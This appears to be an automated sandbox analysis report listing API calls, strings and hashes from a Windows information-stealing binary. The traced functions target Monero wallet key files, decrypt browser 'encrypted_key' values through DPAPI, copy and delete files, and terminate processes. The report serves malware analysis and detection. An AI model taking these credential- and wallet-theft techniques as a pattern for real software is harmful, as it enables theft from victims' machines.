                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • memset.MSVCRT ref: 0069716A
                            Strings
                            • si, xrefs: 006972AE, 00697179, 0069717C
                            • si, xrefs: 00697111
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0069718C
                            Similarity
                            • API ID: lstrcpymemset
                            • String ID: si$si$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 4047604823-4068855434
                            • Opcode ID: ac7cfe3b3eddee9162d28b44b26b0fe9a9e8c2e205eae82552e043b2893bd61e
                            • Instruction ID: ebc5dfa74b3770a1b8d6c13b45b17e578916066892b3a5f9868987645116058c
                            • Opcode Fuzzy Hash: ac7cfe3b3eddee9162d28b44b26b0fe9a9e8c2e205eae82552e043b2893bd61e
                            • Instruction Fuzzy Hash: 74518FB0C142189BDF54EB90DD85BEEB3BAAF04304F2440ADE60567681EB746E89CF58
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00697E37
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00697E3E
                            • RegOpenKeyExA.ADVAPI32(80000002,0139B6C8,00000000,00020119,?), ref: 00697E5E
                            • RegQueryValueExA.ADVAPI32(?,013AD398,00000000,00000000,000000FF,000000FF), ref: 00697E7F
                            • RegCloseKey.ADVAPI32(?), ref: 00697E92
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                            • Instruction ID: 7ada373f0df84e31523477aa254055fea2af42020d433445b9c9c0064b37c3f9
                            • Opcode Fuzzy Hash: a24b84fbabd029b173358b7a2c97b4e895670a37fdb4bdd051fcc3337baa7d1d
                            • Instruction Fuzzy Hash: 1F1170B1A44209EBDB08CF95DD49FBBBBBDFB44B14F104169F605A7680D7745C018BA1
                            APIs
                            • StrStrA.SHLWAPI(013AD9F0,?,?,?,0069140C,?,013AD9F0,00000000), ref: 0069926C
                            • lstrcpyn.KERNEL32(008CAB88,013AD9F0,013AD9F0,?,0069140C,?,013AD9F0), ref: 00699290
                            • lstrlen.KERNEL32(?,?,0069140C,?,013AD9F0), ref: 006992A7
                            • wsprintfA.USER32 ref: 006992C7
                            Strings
                            Similarity
                            • API ID: lstrcpynlstrlenwsprintf
                            • String ID: %s%s
                            • API String ID: 1206339513-3252725368
                            • Opcode ID: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                            • Instruction ID: 22b44be23559a09b600e01ea1711c54c8118c5f2a40de5a83ef9a6f1b77d9691
                            • Opcode Fuzzy Hash: 624853afe8aa9417f01e1385c6b721e1c79f1f0fc7c7bffe2276f6fafd7fd447
                            • Instruction Fuzzy Hash: 8D01977550010CFFCB08DFECD988EAE7BB9FB44368F148148F9099B604C635AE509B91
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                            • RegCloseKey.ADVAPI32(?), ref: 006812FF
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                            • Instruction ID: 4af25865cfd4aa7625a67362c942dbc0ed2a456675e6f40a157ebc6525b52e37
                            • Opcode Fuzzy Hash: bea8292ea5f9cdee7ad0d77bd5c422a3f078db5b6fdf4d201b8dcf8ec57905cd
                            • Instruction Fuzzy Hash: 07011DB9A4020CBBDB04DFE0DC49FAEB7B8FB48705F008159FA0597280D6719A018B51
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00696663
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00696726
                            • ExitProcess.KERNEL32 ref: 00696755
                            Strings
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                            • Instruction ID: b6e6a7264e95985509722462fbf47d10df5a47f5d92e5fd2bac7cbf7f3262185
                            • Opcode Fuzzy Hash: 77ff7c66eb4e8fae6ed9f5a6e9d42807a0a0ee5fd2839aafbee09e45f4c6ec6c
                            • Instruction Fuzzy Hash: 393127B1801218ABDB58EB90DD86FDEB7BDBF04300F404189F20966191DF746A48CFAA
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E28,00000000,?), ref: 0069882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698836
                            • wsprintfA.USER32 ref: 00698850
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                            • Instruction ID: c7e0a861ac91e5bf3000c6a050531de0fce3c7edb0353227afabb7b877ee9b7e
                            • Opcode Fuzzy Hash: 04ea56e95a159bbe4433f8d22aa668c36d65a8c0daeab7e19f176b0da355914b
                            • Instruction Fuzzy Hash: AE211FB1E40208AFDB04DFD4DD49FAEBBB9FB48715F104119F605A7680C779A901CBA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                            • wsprintfW.USER32 ref: 00698D78
                            Strings
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                            • Instruction ID: f77331d54b21838d2b694f741d87e0fbb8019874457826e66a74c1c162caddb9
                            • Opcode Fuzzy Hash: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                            • Instruction Fuzzy Hash: 2FE08CB0A4020CBBDB04DB94DC0AE6977B8FB0470AF0000A4FD0987280DA719E008B96
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0068A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0068A6BC
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0068A743
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                            • Instruction ID: 99e52da9a13297e65049025ac139a5642b0256025dab14e38f67b2e43a574610
                            • Opcode Fuzzy Hash: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                            • Instruction Fuzzy Hash: E8E1DC728201189ADF48FBE4DD92EEE737EBF14300F50815DF51676491EE306A49CBAA
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D481
                            • lstrlen.KERNEL32(00000000), ref: 0068D698
                            • lstrlen.KERNEL32(00000000), ref: 0068D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0068D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                            • Instruction ID: 5a3d46461ca49818272ea98771e230742dd12d1102323d2031f524f3e6c13d45
                            • Opcode Fuzzy Hash: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                            • Instruction Fuzzy Hash: 8191FE718201189BDF48FBE4DD96DEE73BEBF14300F50416DF50666491EE346A09CBAA
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D801
                            • lstrlen.KERNEL32(00000000), ref: 0068D99F
                            • lstrlen.KERNEL32(00000000), ref: 0068D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0068DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                            • Instruction ID: ea3d857fbf0bec98a202f9d59b54e6732cb1ebe7a81ed805ebd2eed1e91c5a05
                            • Opcode Fuzzy Hash: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                            • Instruction Fuzzy Hash: 6881FF719201189BDF48FBE4DD96DEE73BEBF14300F50412DF406A6491EE346A09CBAA
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 9ac3404a806a09c679de59e709741886fdd85ecd90cb493380494de2aea051c7
                            • Instruction ID: e53e50d83d64f9b6193be55d349c9cf5e19c04c30db73a7d554c8eed8ce13727
                            • Opcode Fuzzy Hash: 9ac3404a806a09c679de59e709741886fdd85ecd90cb493380494de2aea051c7
                            • Instruction Fuzzy Hash: C3414E75D10109AFDF04EFE4D885AFEB7BAAB44304F008018E51677790EB35AA06CFA5
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              • Part of subcall function 00689B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                              • Part of subcall function 00689B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                              • Part of subcall function 00689B60: LocalFree.KERNEL32(?), ref: 00689BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 82ca6c9e7f5479e55980ae99a3a653afe0f2448a51387a8e54de6ab6b04b9af5
                            • Instruction ID: 08692f5424a242ed3bcd47ad1b5a83d4947d9ebfc7bdc3193cdc7ede7e15d02d
                            • Opcode Fuzzy Hash: 82ca6c9e7f5479e55980ae99a3a653afe0f2448a51387a8e54de6ab6b04b9af5
                            • Instruction Fuzzy Hash: 263130B5D10209EBCF04EBE4DC85AFEB7BABF48304F184619E905A7241E7349A04CBA5
                            APIs
                            • memset.MSVCRT ref: 006994EB
                              • Part of subcall function 00698D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                              • Part of subcall function 00698D50: RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                              • Part of subcall function 00698D50: wsprintfW.USER32 ref: 00698D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006995AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006995C9
                            • CloseHandle.KERNEL32(00000000), ref: 006995D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 4d813b720aaedc113e39d39edc1a5f0e18393bf6f1fdf2aec17ac28245b6401e
                            • Instruction ID: cf8b766307c6f707db040edcb6cf93071fa1ca702123c8f2c5080db16802d5fa
                            • Opcode Fuzzy Hash: 4d813b720aaedc113e39d39edc1a5f0e18393bf6f1fdf2aec17ac28245b6401e
                            • Instruction Fuzzy Hash: D8313A71A0020CAFDF14DBE4CD49FEEB7B9FB44304F104459E506AB684DB74AA89CB52
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05B7), ref: 006986CA
                            • Process32First.KERNEL32(?,00000128), ref: 006986DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006986F3
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • CloseHandle.KERNEL32(?), ref: 00698761
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                            • Instruction ID: e16eb9b00ec5023134a0cbe78390f292412913d536e88332ebdf1e242b9f734d
                            • Opcode Fuzzy Hash: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                            • Instruction Fuzzy Hash: 73315971911218ABCF64EB90DD45FEEB7BEFB45700F1041A9A10AA65A0DB306E45CFA1
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E00,00000000,?), ref: 006979B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006979B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,006A0E00,00000000,?), ref: 006979C4
                            • wsprintfA.USER32 ref: 006979F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                            • Instruction ID: f5f4d492f384167bc8019fa18423e5f6f358f72cfcd2c2f57ecb21130b22cf91
                            • Opcode Fuzzy Hash: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                            • Instruction Fuzzy Hash: 701127B2904118ABCB18DFC9DD45FBEB7F8FB4CB15F10421AF605A2280E2395940CBB1
                            APIs
                            • __getptd.LIBCMT ref: 0069C74E
                              • Part of subcall function 0069BF9F: __amsg_exit.LIBCMT ref: 0069BFAF
                            • __getptd.LIBCMT ref: 0069C765
                            • __amsg_exit.LIBCMT ref: 0069C773
                            • __updatetlocinfoEx_nolock.LIBCMT ref: 0069C797
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                            • String ID:
                            • API String ID: 300741435-0
                            • Opcode ID: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                            • Instruction ID: 5c9ee928dc7781f0dee2da71b98ac7a91f90e07fc9e2c178aba364251901b3b3
                            • Opcode Fuzzy Hash: 4cb9990aef3ce1a8107b640a40cbe649b41aff0f4eb4a208abc5826eea7693b5
                            • Instruction Fuzzy Hash: 7CF06D329006009BDFA0BBF86946B9933EBAF00730F20514DF404AAAD2DB645941AE9A
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 00694F7A
                            • lstrcat.KERNEL32(?,006A1070), ref: 00694F97
                            • lstrcat.KERNEL32(?,013A88C0), ref: 00694FAB
                            • lstrcat.KERNEL32(?,006A1074), ref: 00694FBD
                              • Part of subcall function 00694910: wsprintfA.USER32 ref: 0069492C
                              • Part of subcall function 00694910: FindFirstFileA.KERNEL32(?,?), ref: 00694943
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FDC), ref: 00694971
                              • Part of subcall function 00694910: StrCmpCA.SHLWAPI(?,006A0FE0), ref: 00694987
                              • Part of subcall function 00694910: FindNextFileA.KERNEL32(000000FF,?), ref: 00694B7D
                              • Part of subcall function 00694910: FindClose.KERNEL32(000000FF), ref: 00694B92
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                            • String ID:
                            • API String ID: 2667927680-0
                            • Opcode ID: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                            • Instruction ID: 41fdde4c53423ddd8d702985f4f5abc650967a4b5d1d3b3b57eaaeb5eed5336f
                            • Opcode Fuzzy Hash: 7f078e4fbbeaffd5dcc9e01b62753629db2e9a59456b5847fde12931dba1ad7e
                            • Instruction Fuzzy Hash: 8121C8B69002086BCB98FBB0EC46EE9337DBB55304F004558B64997581EE749AC9CF96